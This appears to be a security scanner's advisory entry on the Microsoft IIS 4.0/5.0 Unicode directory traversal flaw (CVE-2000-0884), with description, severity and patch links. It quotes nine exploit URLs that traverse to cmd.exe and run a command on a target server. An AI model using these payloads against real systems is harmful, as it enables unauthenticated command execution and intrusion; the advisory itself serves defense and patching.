| VID |
22103 |
| Severity |
40 |
| Port |
80, ¡¦ |
| Protocol |
TCP |
| Class |
WWW |
| Detailed Description |
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
An anonymous person posts that they can run arbitrary commands on IIS 4.0/5.0 using the following URL:
http://target.server/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://target.server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
* References:
http://technet.microsoft.com/en-us/security/bulletin/ms00-078 |
| Recommendation |
The patch released with the advisory MS00-057 (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp) eliminates this vulnerability, therefore those who have already applied this patch do not have to take any further action. Otherwise, the patch is available at the following locations:
IIS 4.0
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
IIS 5.0
http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp |
| Related URL |
CVE-2000-0884 (CVE) |
| Related URL |
(SecurityFocus) |
| Related URL |
(ISS) |
|
